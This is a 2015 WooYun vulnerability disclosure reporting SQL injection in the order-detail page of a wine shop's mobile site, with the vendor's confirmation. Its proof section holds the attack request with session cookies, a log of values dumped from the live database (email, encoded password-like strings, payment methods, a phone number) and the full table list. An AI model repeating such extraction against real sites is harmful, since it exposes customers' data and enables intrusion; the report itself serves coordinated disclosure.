当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124806

漏洞标题:趣网旗下品酒网一处SQL注入(厂商修复没有一系列的流程导致躺枪)

相关厂商:qu.cn

漏洞作者: 小龙

提交时间:2015-07-06 15:09

修复时间:2015-08-24 09:58

公开时间:2015-08-24 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

上卖避孕套,下卖知名红酒

详细说明:

酒品.png


QQ截图20150706025549.png


随便找了一个都是卖了一千+的。。看来这个品牌不错
有意思可以给我邮一瓶,嘎嘎

22222222222222222222222222222222222.png


333333333333333333333333333333.png


4444444444444444444444444444444444.png


卖的还是挺火的。。用户也挺多

漏洞证明:

1.txt

GET /order.php?act=detail&order_sn=2015070520670 HTTP/1.1
Host: m.pinjiu.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=v602rqshkmsbe5rfe36tbdudf5; 
ecsid=398a1415d3133e21e21916b9d5c6ab29ff96417e; referer=http%3A%2F
%2Fwww.baidu.com%2Flink%3Furl%3D4ijpm-CxIq40H5Ds8U9_QwOEKmuxePjbe5eKHJJniOW%26wd
%3D%26eqid%3Dce71eacf0000b34b0000000555996a1f; 
Hm_lvt_36b8ed2a4ed9345c6804dca4d6d7180c=1436117445,1436117491,1436117492; 
Hm_lpvt_36b8ed2a4ed9345c6804dca4d6d7180c=1436117554; lastcar=797; 
cartid=398a1415d3133e21e21916b9d5c6ab29; eurl=m.pinjiu.com; 
Hm_lvt_5edbd0cb00504a3c6f725a1086bb12f5=1436117522; 
Hm_lpvt_5edbd0cb00504a3c6f725a1086bb12f5=1436117675


登陆账号才可以注入

[02:48:21] [INFO] retrieved: qu@hotmail.com
[02:48:21] [INFO] retrieved: cjXBfeJIFeN8dT+73Tyq8A==
[02:48:21] [INFO] retrieved: 0.00
[02:48:22] [INFO] retrieved: 841
[02:48:22] [INFO] retrieved:
[02:48:22] [INFO] retrieved: 货到付款
[02:48:22] [INFO] retrieved: 02312564589
[02:48:23] [INFO] retrieved:
[02:48:23] [INFO] retrieved: qu@hotmail.com
[02:48:23] [INFO] retrieved: buz9xJFqqqX1bj+p2nBL9g==
[02:48:23] [INFO] retrieved: 0.00
[02:48:24] [INFO] retrieved: 843
[02:48:24] [INFO] retrieved:
[02:48:24] [INFO] retrieved: 货到付款
[02:48:24] [INFO] retrieved: 02312564589
[02:48:25] [INFO] retrieved:
[02:48:25] [INFO] retrieved: qu@hotmail.com
[02:48:25] [INFO] retrieved: TIQlcYYLVIm+rRUQh5vVWw==
[02:48:25] [INFO] retrieved: 0.00
[02:48:25] [INFO] retrieved: 844
[02:48:26] [INFO] retrieved:
[02:48:26] [INFO] retrieved: 支付宝
[02:48:26] [INFO] retrieved: 02312564589
[02:48:26] [INFO] retrieved:
[02:48:27] [INFO] retrieved: qu@hotmail.com
[02:48:27] [INFO] retrieved: TIQlcYYLVIkM2q97x1RDsg==
[02:48:27] [INFO] retrieved: 0.00
[02:48:27] [INFO] retrieved: 845
[02:48:27] [INFO] retrieved:
[02:48:28] [INFO] retrieved: 支付宝
[02:48:28] [INFO] retrieved: 02312564589
[02:48:28] [INFO] retrieved:
[02:48:28] [INFO] retrieved: qu@hotmail.com
[02:48:29] [INFO] retrieved: knoP7m/ohz9PDYW9/5cYyQ==
[02:48:29] [INFO] retrieved: 0.00
[02:48:29] [INFO] retrieved: 846
[02:48:29] [INFO] retrieved:
[02:48:30] [INFO] retrieved: 支付宝
[02:48:30] [INFO] retrieved: 02312564589
[02:48:30] [INFO] retrieved:
[02:48:30] [INFO] retrieved: qu@hotmail.com
[02:48:30] [INFO] retrieved: hKJjwZ1Chd9ek0Rjy/0J7g==
[02:48:31] [INFO] retrieved: 0.00
[02:48:31] [INFO] retrieved: 847
[02:48:31] [INFO] retrieved:
[02:48:32] [INFO] retrieved: 支付宝
[02:48:32] [INFO] retrieved: 02312564589
[02:48:32] [INFO] retrieved:
[02:48:32] [INFO] retrieved: qu@hotmail.com
[02:48:32] [INFO] retrieved: /JvJLZYQMpxKDvBni7FHmg==
[02:48:33] [INFO] retrieved: 0.00
[02:48:33] [INFO] retrieved: 848
[02:48:33] [INFO] retrieved:
[02:48:33] [INFO] retrieved: 货到付款
[02:48:34] [INFO] retrieved: 02312564589
[02:48:34] [INFO] retrieved:
[02:48:34] [INFO] retrieved: qu@hotmail.com
[02:48:34] [INFO] retrieved: 2tasB2KWheR569msGUQonw==
[02:48:34] [INFO] retrieved: 0.00
[02:48:35] [INFO] retrieved: 849
[02:48:35] [INFO] retrieved:
[02:48:35] [INFO] retrieved: 货到付款
[02:48:35] [INFO] retrieved: 02312564589
[02:48:36] [INFO] retrieved:
[02:48:36] [INFO] retrieved: qu@hotmail.com
[02:48:36] [INFO] retrieved: PSD0XcWOiX/Bm9w+YUzpag==
[02:48:36] [INFO] retrieved: 0.00
[02:48:37] [INFO] retrieved: 850
[02:48:37] [INFO] retrieved:
[02:48:37] [INFO] retrieved: 支付宝
[02:48:37] [INFO] retrieved: 02312564589
[02:48:37] [INFO] retrieved:
[02:48:38] [INFO] retrieved: qu@hotmail.com
[02:48:38] [INFO] retrieved: PSD0XcWOiX/Bm9w+YUzpag==
[02:48:38] [INFO] retrieved: 0.00
[02:48:38] [INFO] retrieved: 851
[02:48:39] [INFO] retrieved:
[02:48:39] [INFO] retrieved: 支付宝
[02:48:39] [INFO] retrieved: 02312564589
[02:48:39] [INFO] retrieved:
[02:48:40] [INFO] retrieved: qu@hotmail.com
[02:48:40] [INFO] retrieved: PSD0XcWOiX/Bm9w+YUzpag==
[02:48:40] [INFO] retrieved: 0.00
[02:48:40] [INFO] retrieved: 852
[02:48:41] [INFO] retrieved:
[02:48:41] [INFO] retrieved: 支付宝
[02:48:41] [INFO] retrieved: 02312564589
[02:48:41] [INFO] retrieved:
[02:48:42] [INFO] retrieved: qu@hotmail.com
[02:48:42] [INFO] retrieved: PSD0XcWOiX/Bm9w+YUzpag==
[02:48:42] [INFO] retrieved: 0.00
[02:48:42] [INFO] retrieved: 853
[02:48:42] [INFO] retrieved:
[02:48:43] [INFO] retrieved: 支付宝
[02:48:43] [INFO] retrieved: 02312564589
[02:48:43] [INFO] retrieved:
[02:48:43] [INFO] retrieved: qu@hotmail.com
[02:48:44] [INFO] retrieved: hKJjwZ1Chd9ek0Rjy/0J7g==
[02:48:44] [INFO] retrieved: 0.00
[02:48:44] [INFO] retrieved: 854
[02:48:44] [INFO] retrieved:
[02:48:45] [INFO] retrieved: 支付宝
[02:48:45] [INFO] retrieved: 02312564589
[02:48:45] [INFO] retrieved:
[02:48:45] [INFO] retrieved: qu@hotmail.com
[02:48:45] [INFO] retrieved: hKJjwZ1Chd9ek0Rjy/0J7g==
[02:48:46] [INFO] retrieved: 0.00
[02:48:46] [INFO] retrieved: 855
[02:48:46] [INFO] retrieved:
[02:48:46] [INFO] retrieved: 货到付款
[02:48:47] [INFO] retrieved: 02312564589
[02:48:47] [INFO] retrieved:
[02:48:47] [INFO] retrieved: qu@hotmail.com
[02:48:47] [INFO] retrieved: mONnAqR2poxi2NC+iKVdkQ==
[02:48:48] [INFO] retrieved: 0.00
[02:48:48] [INFO] retrieved: 856
[02:48:48] [INFO] retrieved:
[02:48:48] [INFO] retrieved: 银行汇款
[02:48:49] [INFO] retrieved: 02312564589
[02:48:49] [INFO] retrieved:
[02:48:49] [INFO] retrieved: qu@hotmail.com
[02:48:49] [INFO] retrieved: RmeNK8/cnzhSLERZfWrUzg==
[02:48:50] [INFO] retrieved: 0.00
[02:48:50] [INFO] retrieved: 857
[02:48:50] [INFO] retrieved:
[02:48:50] [INFO] retrieved: 货到付款
[02:48:50] [INFO] retrieved: 02312564589
[02:48:51] [INFO] retrieved:
[02:48:51] [INFO] retrieved: qu@hotmail.com
[02:48:51] [INFO] retrieved: sbZ/n2Mcftf1bj+p2nBL9g==
[02:48:51] [INFO] retrieved: 0.00
[02:48:52] [INFO] retrieved: 858
[02:48:52] [INFO] retrieved:
[02:48:52] [INFO] retrieved: 货到付款
[02:48:52] [INFO] retrieved: 02312564589
[02:48:53] [INFO] retrieved:
[02:48:53] [INFO] retrieved: qu@hotmail.com
[02:48:53] [INFO] retrieved: Z9SVT/N8WS7Ev6SGcBJAvA==
[02:48:53] [INFO] retrieved: 0.00
[02:48:53] [INFO] retrieved: 859
[02:48:54] [INFO] retrieved:
[02:48:54] [INFO] retrieved: 银行汇款
[02:48:54] [INFO] retrieved: 02312564589
[02:48:54] [INFO] retrieved:
[02:48:55] [INFO] retrieved: qu@hotmail.com
[02:48:55] [INFO] retrieved: Z9SVT/N8WS7Ev6SGcBJAvA==
[02:48:55] [INFO] retrieved: 0.00
[02:48:55] [INFO] retrieved: 860
[02:48:56] [INFO] retrieved:
[02:48:56] [INFO] retrieved: 支付宝
[02:48:56] [INFO] retrieved: 02312564589
[02:48:56] [INFO] retrieved:
[02:48:57] [INFO] retrieved: qu@hotmail.com
[02:48:57] [INFO] retrieved: VYNA2VspTpZFdFuLHzEIKw==
[02:48:57] [INFO] retrieved: 0.00
[02:48:57] [INFO] retrieved: 861
[02:48:57] [INFO] retrieved:
[02:48:58] [INFO] retrieved: 货到付款
[02:48:58] [INFO] retrieved: 02312564589
[02:48:58] [INFO] retrieved:
[02:48:58] [INFO] retrieved: qu@hotmail.com
[02:48:59] [INFO] retrieved: 52WDbiI7taU=
[02:48:59] [INFO] retrieved: 0.00
[02:48:59] [INFO] retrieved: 862
[02:48:59] [INFO] retrieved:
[02:49:00] [INFO] retrieved: 货到付款
[02:49:00] [INFO] retrieved: 02312564589
[02:49:00] [INFO] retrieved:
[02:49:00] [INFO] retrieved: qu@hotmail.com
[02:49:00] [INFO] retrieved: 52WDbiI7taU=
[02:49:01] [INFO] retrieved: 0.00
[02:49:01] [INFO] retrieved: 863
[02:49:01] [INFO] retrieved:
[02:49:02] [INFO] retrieved: 货到付款
[02:49:02] [INFO] retrieved: 02312564589
[02:49:02] [INFO] retrieved:
[02:49:02] [INFO] retrieved: qu@hotmail.com
[02:49:03] [INFO] retrieved: epT/ZLD3qrQ=
[02:49:03] [INFO] retrieved: 0.00
[02:49:03] [INFO] retrieved: 864


手机号码姓名地址不跑了。仅此证明

ecs_access_token
 ecs_account_log
 ecs_ad
 ecs_ad_custom
 ecs_ad_position
 ecs_admin_action
 ecs_admin_log
 ecs_admin_message
 ecs_admin_user
 ecs_adsense
 ecs_affiliate_log
 ecs_agency
 ecs_append_subscribe
 ecs_area_region
 ecs_article
 ecs_article_cat
 ecs_attribute
 ecs_auction_log
 ecs_auto_manage
 ecs_back_goods
 ecs_back_order
 ecs_bless
 ecs_bonus_type
 ecs_booking_goods
 ecs_brand
 ecs_card
 ecs_cart
 ecs_cat_recommend
 ecs_category
 ecs_cnzz_manager
 ecs_collect_goods
 ecs_comment
 ecs_comment_phrase
 ecs_crons
 ecs_delivery_goods
 ecs_delivery_order
 ecs_email_list
 ecs_email_sendlist
 ecs_error_log
 ecs_exchange_goods
 ecs_favourable_activity
 ecs_feedback
 ecs_friend_link
 ecs_goods
 ecs_goods_activity
 ecs_goods_article
 ecs_goods_attr
 ecs_goods_bak
 ecs_goods_cat
 ecs_goods_gallery
 ecs_goods_templates
 ecs_goods_type
 ecs_group_goods
 ecs_invitation
 ecs_keywords
 ecs_link_goods
 ecs_mail_templates
 ecs_member_price
 ecs_nav
 ecs_order_action
 ecs_order_goods
 ecs_order_info
 ecs_pack
 ecs_package_goods
 ecs_pay_log
 ecs_payment
 ecs_plugins
 ecs_prize_draw
 ecs_prize_goods
 ecs_prize_log
 ecs_products
 ecs_pwedding
 ecs_reg_extend_info
 ecs_reg_fields
 ecs_region
 ecs_role
 ecs_searchengine
 ecs_sessions
 ecs_sessions_data
 ecs_shipping
 ecs_shipping_area
 ecs_shop_config
 ecs_sms_log
 ecs_snatch_log
 ecs_stats
 ecs_suppliers
 ecs_tag
 ecs_template
 ecs_topic
 ecs_topic_mailtopic
 ecs_user_account
 ecs_user_address
 ecs_user_bonus
 ecs_user_feed
 ecs_user_rank
 ecs_users
 ecs_virtual_card
 ecs_volume_price
 ecs_vote
 ecs_vote_log
 ecs_vote_option
 ecs_wedding
 ecs_wholesale
 ecs_wxbonus_detail


自家的数据库表别说不知道哦- -来个20分吧

修复方案:

1:过滤select等特殊符号,带有执行性的

版权声明:转载请注明来源 小龙@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-10 09:57

厂商回复:

谢谢

最新状态:

暂无